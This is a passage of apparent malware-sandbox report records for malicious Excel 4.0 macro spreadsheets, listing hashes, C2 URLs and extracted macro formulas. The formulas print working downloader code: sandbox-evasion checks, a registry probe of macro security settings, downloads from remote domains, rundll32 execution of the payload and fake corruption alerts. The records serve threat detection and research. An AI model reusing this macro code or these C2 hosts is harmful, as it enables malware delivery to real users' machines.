{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f8b3c0b447a46046c2fcd89570b52c804f330ca324ed67152e3c1d37088f4a2"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f8b3c0b447a46046c2fcd89570b52c804f330ca324ed67152e3c1d37088f4a2","filesize":185344,"md5":"273859ddf13927e0372658e2ec583a34","sha1":"b6c7d275ed9378ad0ddc130a72b4336253987d9b","sha256":"2f8b3c0b447a46046c2fcd89570b52c804f330ca324ed67152e3c1d37088f4a2","sha512":"d6337b3e3a8f5040f8df5b1a55fd40800367f0bcd2d94cc8ea512dcbd2fa5bd42d25ceee54fec5f27ea205e021dace3da3d46cd85afaf5b2b89b8435759669d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f8b3c0b447a46046c2fcd89570b52c804f330ca324ed67152e3c1d37088f4a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f9f5a33f3556f1654264929ae5f181fa1fafa71a83e273383c20f09c1373821"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f9f5a33f3556f1654264929ae5f181fa1fafa71a83e273383c20f09c1373821","filesize":113664,"md5":"821cd75e77168c9f10c8384ab6e40f0a","sha1":"bf0f6175e6c4a3f173f2f763942c9898b9a62130","sha256":"2f9f5a33f3556f1654264929ae5f181fa1fafa71a83e273383c20f09c1373821","sha512":"feacfe419dcc3389a0b9aa45f78f364999e3542e3517ebbd2459d3ff4be0229efbc9381aad15f8a23d88104bea726b627eb3907fe909f99f8925341eb90af0e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f9f5a33f3556f1654264929ae5f181fa1fafa71a83e273383c20f09c1373821.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qmIxf4QH72\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2fa52ffdbccd0b0e4e3b6a064946fdfddd38a6dd61b93de00f89a07d23786393"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2fa52ffdbccd0b0e4e3b6a064946fdfddd38a6dd61b93de00f89a07d23786393","filesize":185344,"md5":"b392325bca1f4a51936b489645569aa1","sha1":"c7b62dd547fa6e627d1aa44e1a3d26e1a5d56e43","sha256":"2fa52ffdbccd0b0e4e3b6a064946fdfddd38a6dd61b93de00f89a07d23786393","sha512":"3271b94a4724fe600e770e67208978ec63faf0b951120ba53e7f5eeba88bec23b5b8ccc2307be8a447025b1433d1c01ad546e530b7088a444b7c9616ea6cc6d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2fa52ffdbccd0b0e4e3b6a064946fdfddd38a6dd61b93de00f89a07d23786393.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2fb095b06040626015b2f48641c6aff4a01f7abde9546c75495e2bb0547ea6c1"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2fb095b06040626015b2f48641c6aff4a01f7abde9546c75495e2bb0547ea6c1","filesize":185344,"md5":"a71f2f0e2036409e16a00ef846036a69","sha1":"05693e6037f5701eb439d5d3dabb9a3f8c5deb5d","sha256":"2fb095b06040626015b2f48641c6aff4a01f7abde9546c75495e2bb0547ea6c1","sha512":"f9fb4ba3d06ff609ed2ab15082afb7e7cd0932dc4cb76061f4bdea2db1db353f85c469adc134d4fb9ee66c585930047b1589a82cebb6cb4c333b5f6474f2bd14","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2fb095b06040626015b2f48641c6aff4a01f7abde9546c75495e2bb0547ea6c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f","filesize":144384,"md5":"75ba7a6c1d186d3c9ad4553b10f386e1","sha1":"8aba6ad8a58d9729e1b9ebddf640b95bd373ac62","sha256":"2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f","sha512":"0fcfd2c585114893dd3be99bb2f1b2fbdebda8200bbfec58cefc636e019ee53cd01b0a2dc55a1069d9da25118e5eedd3be062ea982e5ee757861359257603a90","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"NRU0CA4rTt\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2fc477f1d9b50c594a08926148b41f7b71fd63ff6418b912fd2ac906c7e0aa72"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2fc477f1d9b50c594a08926148b41f7b71fd63ff6418b912fd2ac906c7e0aa72","filesize":168960,"md5":"9c1cc0a95448df2729f630172f72ec9c","sha1":"ceaf78885a94f9550fe77b1485ce4cbbe4bb45ac","sha256":"2fc477f1d9b50c594a08926148b41f7b71fd63ff6418b912fd2ac906c7e0aa72","sha512":"0ba8597e451949f4381ad76545f1433329b799f0f5b83af730c1833d1976893c9e0ae8a3ed02ddd46b07ea635ed97d0b41c0fecb2850b6b7f3c3247dedf207fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2fc477f1d9b50c594a08926148b41f7b71fd63ff6418b912fd2ac906c7e0aa72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VV7WaC3t2Z\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3009a58dbf8224159ab5528c0bd66d817737f829c7729e4c46ed9a47b8c4c0e8"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3009a58dbf8224159ab5528c0bd66d817737f829c7729e4c46ed9a47b8c4c0e8","filesize":185344,"md5":"cc61adc6ceeb62b602bb9a028995df84","sha1":"57fbea0975c1f08a5bb0babe187ead4fb15c458b","sha256":"3009a58dbf8224159ab5528c0bd66d817737f829c7729e4c46ed9a47b8c4c0e8","sha512":"494b2304e45445f6344f1a312c36e5e7e8d2d24a6ae56c6ff1b59eb67c6fb86935c20336dfb76166ca76df3bce5e9801f1a249c645cb4293b2f4a8ad63582a0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3009a58dbf8224159ab5528c0bd66d817737f829c7729e4c46ed9a47b8c4c0e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30110d0e8dee0f528ceb0c3f4778202d27487921bb819484137a27d14c696494"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30110d0e8dee0f528ceb0c3f4778202d27487921bb819484137a27d14c696494","filesize":209408,"md5":"3a24955dca4b74d46923f91f084685f8","sha1":"c54868a1ba0f3f85801b6ee5fe68a45f4fe2361b","sha256":"30110d0e8dee0f528ceb0c3f4778202d27487921bb819484137a27d14c696494","sha512":"1aeed9c38f2d075adbbaca8fe82716af59d812d84eccb6e38d61e79e52719473f08831713afe3866177fba9d786f60c3bcd99f07d1c48478f8e9be70abaa635d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30110d0e8dee0f528ceb0c3f4778202d27487921bb819484137a27d14c696494.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Vtk7bjjmET\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3014624138b39b127b5413226538fe4a70b7e55537063625da76ddb052d0ce0c"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3014624138b39b127b5413226538fe4a70b7e55537063625da76ddb052d0ce0c","filesize":167936,"md5":"7d8b4a9145fec135a5121881b004709e","sha1":"091e7d117c86f0a0d10255503f36ea88fefe2b31","sha256":"3014624138b39b127b5413226538fe4a70b7e55537063625da76ddb052d0ce0c","sha512":"5389484dc73006f5a931044e4dca8a6cbf0369c1c67700ebdf586346c563c6a9cddcd5571fe74eb3140b8158a9ef3f21de3f6edc6ac231792f84f9ab0b2b3eab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3014624138b39b127b5413226538fe4a70b7e55537063625da76ddb052d0ce0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"giMqvfz5NG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30167b2d9c34e39f39a368fb71ab97a47a261670edd7befa3869abce8c24d19a"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30167b2d9c34e39f39a368fb71ab97a47a261670edd7befa3869abce8c24d19a","filesize":209920,"md5":"9b0aa38eda0d131ed1b201cac46177d0","sha1":"951c34e7c2bffc678a860af49e864b7f336091d9","sha256":"30167b2d9c34e39f39a368fb71ab97a47a261670edd7befa3869abce8c24d19a","sha512":"fb13fa997751084d58ab6abe90248bd2a826245736992c8deea950d94c47c7b244f65ba16dae5b377046d6289bc0b0d67fbaee5e36c39014254e5204838d8b7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30167b2d9c34e39f39a368fb71ab97a47a261670edd7befa3869abce8c24d19a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EQovgkCxNR\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30175739414fa301617ed6f0234992f1b3bc67a8547185cd332ad42c5a170486"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30175739414fa301617ed6f0234992f1b3bc67a8547185cd332ad42c5a170486","filesize":168960,"md5":"6653d25de863888da5fb463605ddd1d3","sha1":"341be2a116cc89d7fc826489e2aed92cbe7321f6","sha256":"30175739414fa301617ed6f0234992f1b3bc67a8547185cd332ad42c5a170486","sha512":"96b91a6feaa1b5cdd34b61b37d4468cc2b28054c142529ff3cce55a66ea5af8e8be66cb30aa5f04bf626edfcac7c4e356e952e3eae254cd1c4373983b7f5c2b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30175739414fa301617ed6f0234992f1b3bc67a8547185cd332ad42c5a170486.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k1l0LIGnPw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"302457518bc9da3a2e00d598e2ef752e4cdb7d0dd3516a8d0da370fd6f87b087"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"302457518bc9da3a2e00d598e2ef752e4cdb7d0dd3516a8d0da370fd6f87b087","filesize":152576,"md5":"052160451b5f984f7cfaada56740e64a","sha1":"7af4b3af721ad7f26d0eba60277c6b17ab291901","sha256":"302457518bc9da3a2e00d598e2ef752e4cdb7d0dd3516a8d0da370fd6f87b087","sha512":"18ae46ca6a9585af35c8a0f566fca328919c730e47ee18f0678395340a48b1d5de18b0c3494469fbdd44b004a72540f260f4870d71561d1e2d443ac61715332f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"302457518bc9da3a2e00d598e2ef752e4cdb7d0dd3516a8d0da370fd6f87b087.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Jy73chxdzi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3025cdbb84fc0398f0e215093cc9b5b3e23e7e02501d488717d12df1d6be5997"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3025cdbb84fc0398f0e215093cc9b5b3e23e7e02501d488717d12df1d6be5997","filesize":112128,"md5":"a2e3d22f8e04d7cb92e96b07a28179e2","sha1":"b646487f454185f70d485766a3a1aa1913de3e4c","sha256":"3025cdbb84fc0398f0e215093cc9b5b3e23e7e02501d488717d12df1d6be5997","sha512":"d7d70a9ee5eab3df956286aba5ded0800f82135ea8a3386ff2302e6792f2201ea418ba971e6d0cd4763db5c0805ac46149747193e604858fbe9e1929592043c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3025cdbb84fc0398f0e215093cc9b5b3e23e7e02501d488717d12df1d6be5997.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30448f3395711fa04bc8f7284125a70f1ff831d3d48d1a224eb9c5a786a4a990"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30448f3395711fa04bc8f7284125a70f1ff831d3d48d1a224eb9c5a786a4a990","filesize":177152,"md5":"d422dabd59b71a52481d0c9d93c3ccd4","sha1":"cb0ea17909cb69c0360b2c92d977b2b0c6d4bbdd","sha256":"30448f3395711fa04bc8f7284125a70f1ff831d3d48d1a224eb9c5a786a4a990","sha512":"52fa79321be61ae303251ee6b1fc096e26d2773173fde782af914aabdab1dd5b7e701ba6fb005800af842b0b8b2fec3ad5fa8aa8bfdc3b4e03b12095d54803ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30448f3395711fa04bc8f7284125a70f1ff831d3d48d1a224eb9c5a786a4a990.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EDf96hwXFH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"304c010a965739918e8938b4cdb783c10f9d14987c6bbd762db447053ad4472d"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"304c010a965739918e8938b4cdb783c10f9d14987c6bbd762db447053ad4472d","filesize":177152,"md5":"1b1ed8d664af0ef46ceade7062c78f86","sha1":"8766e65f1541f83e46970bbb84d997b5d4232e89","sha256":"304c010a965739918e8938b4cdb783c10f9d14987c6bbd762db447053ad4472d","sha512":"774b7d9d34b5ac39b6437b7205820a531c43b34da2813e329a53262185e0f79e48d450a02b0dc08df8ea861fa919fe628891ea0e8db7912960ba2927531737a9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"304c010a965739918e8938b4cdb783c10f9d14987c6bbd762db447053ad4472d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6AT4ut4mHq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3073662d1e8e287cb939d52f865beec6ba3649a869f65b9bd2174b64e3f73c14"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3073662d1e8e287cb939d52f865beec6ba3649a869f65b9bd2174b64e3f73c14","filesize":206336,"md5":"f18eccf28f7b3bed54025b323445ce2b","sha1":"821ca3961e1c5b0db0b9d4ab1e1f973ecd7ed2e4","sha256":"3073662d1e8e287cb939d52f865beec6ba3649a869f65b9bd2174b64e3f73c14","sha512":"c36fd3d186b1a9ae9c82fc5e9d6742683f0ef1c78529f15c21b79973193f6d23b594d918ad9a1f268159bd6d428b3146c71038d0d2d6b830a46e2b53710bc063","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3073662d1e8e287cb939d52f865beec6ba3649a869f65b9bd2174b64e3f73c14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"67yZ0MJWJx\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3076c4ade2998ada92d5c9a68954dd91bad7f544d4fd6d4d337dec4b6c1877aa"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3076c4ade2998ada92d5c9a68954dd91bad7f544d4fd6d4d337dec4b6c1877aa","filesize":185344,"md5":"374d80181b3966f12b1334a64ed7b9c9","sha1":"acb6d7def9e9d8db610b031a39ed7e53e4f35614","sha256":"3076c4ade2998ada92d5c9a68954dd91bad7f544d4fd6d4d337dec4b6c1877aa","sha512":"4b3bbc7122c8167520f2fd5ad38a45ead7acfa9140919ba066f429953684162dba4be30fafeed08ade2733407cd8e5f52bfba044a5a0c5767bc971e701397be0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3076c4ade2998ada92d5c9a68954dd91bad7f544d4fd6d4d337dec4b6c1877aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we 